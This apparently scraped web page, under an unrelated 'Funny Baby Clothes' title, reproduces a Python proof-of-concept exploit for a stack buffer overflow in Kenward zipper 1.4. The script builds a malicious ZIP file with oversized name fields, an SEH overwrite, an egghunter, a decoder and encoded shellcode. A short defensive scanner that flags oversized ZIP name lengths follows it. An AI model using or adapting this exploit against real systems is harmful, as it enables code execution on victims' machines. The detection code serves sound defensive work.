Funny Baby Clothes - View Content

kenward-zipper.py.txt

article loaded: Sun, 05 Sep 2010 02:40:17 -0400

#!/usr/bin/python
# #################################################################################################
# Exploit Title : Kenward zipper v1.4 0day Stack Buffer Overflow PoC exploit
# Date : 23/3/2010
# Bug found by : corelanc0d3r (http://www.corelan.be:8800/)
# Author : mr_me (http://net-ninja.net/)
# Software Link : http://ken-ward-s-zipper.software.informer.com/
# Version : 1.4
# OS : Windows
# Tested on : XP SP3 En
# Greetz to : Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
# #################################################################################################
# http://www.abysssec.com/blog/2010/03/ken-ward-zipper-stack-bof-0day-a-not-so-typical-seh-exploit/
print "|------------------------------------------------------------------|"
print "| __ __ |"
print "| _________ ________ / /___ _____ / /____ ____ _____ ___ |"
print "| / ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ |"
print "| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |"
print "| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ |"
print "| |"
print "| http://www.corelan.be:8800 |"
print "| security@corelan.be |"
print "| |"
print "|-------------------------------------------------[ EIP Hunters ]--|"
print "~~> Kenward zipper v1.4 0day Stack Buffer Overflow PoC exploit <~~"

ldf_header = ("\x50\x4B\x03\x04\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\xe4\x0f\x00\x00\x00")

#central directory header
cdf_header = ("\x50\x4B\x01\x02\x14\x00\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe4\x0f\x00\x00\x00\x00\x00\x00\x01\x00\x24\x00\x00"
"\x00\x00\x00\x00\x00")

# end of central directory header
eofcdf_header = ("\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00"
"\x12\x10\x00\x00\x02\x10\x00\x00\x00\x00")

# custom decoder
decoder = ("\x25\x4A\x4D\x4E\x55"
"\x25\x35\x32\x31\x2A\x2d\x55\x55"
"\x55\x5f\x2d\x56\x55\x56\x5f\x2d"
"\x55\x55\x55\x5e\x50\x25\x4A\x4D"
"\x4E\x55\x25\x35\x32\x31\x2A\x2d"
"\x2b\x5b\x39\x54\x2d\x2a\x5b\x39"
"\x54\x2d\x2a\x5f\x39\x55\x50")

# ascii egghunter
egghunter= ("JJJJJJJJJJJJJJJJJ7RYjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIQvK1"
"9ZKO6orbv2bJgr2xZmtnulfePZPthoOHbwFPtpbtLKkJLo1eJJloPuKW9okWA");

# shellcode
calc = ("\xd9\xf7\xd9\x74\x24\xf4\x5b\x53\x59\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41"
"\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42"
"\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b"
"\x4c\x4a\x48\x51\x54\x45\x50\x43\x30\x45\x50\x4c\x4b\x51\x55"
"\x47\x4c\x4c\x4b\x43\x4c\x43\x35\x43\x48\x43\x31\x4a\x4f\x4c"
"\x4b\x50\x4f\x44\x58\x4c\x4b\x51\x4f\x47\x50\x45\x51\x4a\x4b"
"\x50\x49\x4c\x4b\x46\x54\x4c\x4b\x43\x31\x4a\x4e\x50\x31\x49"
"\x50\x4a\x39\x4e\x4c\x4b\x34\x49\x50\x42\x54\x44\x47\x49\x51"
"\x49\x5a\x44\x4d\x45\x51\x49\x52\x4a\x4b\x4b\x44\x47\x4b\x50"
"\x54\x47\x54\x45\x54\x44\x35\x4d\x35\x4c\x4b\x51\x4f\x51\x34"
"\x43\x31\x4a\x4b\x42\x46\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x51"
"\x4f\x45\x4c\x43\x31\x4a\x4b\x4c\x4b\x45\x4c\x4c\x4b\x43\x31"
"\x4a\x4b\x4c\x49\x51\x4c\x46\x44\x43\x34\x48\x43\x51\x4f\x50"
"\x31\x4a\x56\x43\x50\x50\x56\x42\x44\x4c\x4b\x50\x46\x50\x30"
"\x4c\x4b\x47\x30\x44\x4c\x4c\x4b\x42\x50\x45\x4c\x4e\x4d\x4c"
"\x4b\x42\x48\x45\x58\x4b\x39\x4a\x58\x4b\x33\x49\x50\x42\x4a"
"\x50\x50\x42\x48\x4c\x30\x4c\x4a\x44\x44\x51\x4f\x45\x38\x4a"
"\x38\x4b\x4e\x4d\x5a\x44\x4e\x46\x37\x4b\x4f\x4d\x37\x42\x43"
"\x45\x31\x42\x4c\x43\x53\x46\x4e\x43\x55\x43\x48\x45\x35\x45"
"\x50\x41\x41");

# chasing the stack....
align = "\x61" * 67 + "\x58\x58\x73\xf9"

# ;)
name = "\x6D\x72\x5F\x6D\x65\x73\x5F\x70\x61\x73\x73\x77\x6F"
"\x72\x64\x5F\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E"

print "[+] Building attack string..."

# my final attack string
exploit = name
exploit += "\x43" * 266
exploit += egghunter
exploit += "\x43" * (878-len(exploit))
exploit += "\x54\x5a"
exploit += decoder
exploit += "\x73\xf9"
exploit += "\x44" * (67-len(decoder))
exploit += "\x73\xf9"
exploit += align
exploit += "\x42" * (1022-len(exploit))
exploit += "\x73\xf9\x41\x41"
exploit += "\x6d\x26\x44\x00"
exploit += "\x57\x30\x30\x54"
exploit += "\x57\x30\x30\x54"
# when the ninja strikes the samurai, the emperor wore no clothes
exploit += calc
exploit += "\x42" * (4064-len(exploit))
exploit += "\x2e\x74\x78\x74"

print "[+] Writing payload to cst-kenzip.zip"
# write the payload
mefile = open('cst-kenzip.zip','w');
mefile.write(ldf_header + exploit + cdf_header + exploit + eofcdf_header);
mefile.close()
print "[+] Exploit file created!!"
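
The script above writes a ZIP whose local file header and central directory header both declare a file name length of 0x0fe4 (4068) bytes. As a defensive illustration added here (not part of the original PoC), the following Python 3 code scans an archive for header records whose declared name length exceeds a limit or runs past the end of the file. The 255-byte limit, the function names and the sample archives are assumptions constructed for this example.

```python
import struct

LFH_SIG = b"PK\x03\x04"  # local file header signature
CDH_SIG = b"PK\x01\x02"  # central directory header signature
MAX_NAME = 255           # assumed policy limit for a member name, in bytes

# (signature, label, offset of the 2-byte name length, fixed header size)
RECORDS = ((LFH_SIG, "local", 26, 30), (CDH_SIG, "central", 28, 46))

def scan_zip_names(data, max_name=MAX_NAME):
    """Return sorted (offset, kind, name_len) for suspicious header records.

    A record is reported when its declared file name length exceeds
    max_name or when the name would extend past the end of the data.
    Signatures are found by byte search, so a hit inside member data is
    possible; treat results as leads to verify, not as proof.
    """
    findings = []
    for sig, kind, len_off, fixed in RECORDS:
        pos = data.find(sig)
        while pos != -1:
            if pos + fixed <= len(data):  # skip records cut off mid-header
                (name_len,) = struct.unpack_from("<H", data, pos + len_off)
                if name_len > max_name or pos + fixed + name_len > len(data):
                    findings.append((pos, kind, name_len))
            pos = data.find(sig, pos + 4)
    return sorted(findings)

def build_sample(name):
    """Build a one-entry, zero-length stored archive (constructed test input)."""
    n = len(name)
    local = struct.pack("<4sHHHHHIIIHH", LFH_SIG, 20, 0, 0, 0, 0, 0, 0, 0, n, 0)
    central = struct.pack("<4sHHHHHHIIIHHHHHII", CDH_SIG, 20, 20, 0, 0, 0, 0,
                          0, 0, 0, n, 0, 0, 0, 0, 0, 0)
    cd_offset = len(local) + n
    eocd = struct.pack("<4sHHHHIIH", b"PK\x05\x06", 0, 0, 1, 1,
                       len(central) + n, cd_offset, 0)
    return local + name + central + name + eocd

if __name__ == "__main__":
    # Constructed inputs: an ordinary name, and benign filler of the same
    # declared length (4068) that the headers on this page use.
    for label, name in (("normal", b"readme.txt"), ("oversized", b"A" * 4068)):
        print(label, scan_zip_names(build_sample(name)))
```

A scanner like this can run at a mail or upload gateway before an archive reaches a desktop unzip tool; tune `max_name` to the longest path your environment legitimately needs.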
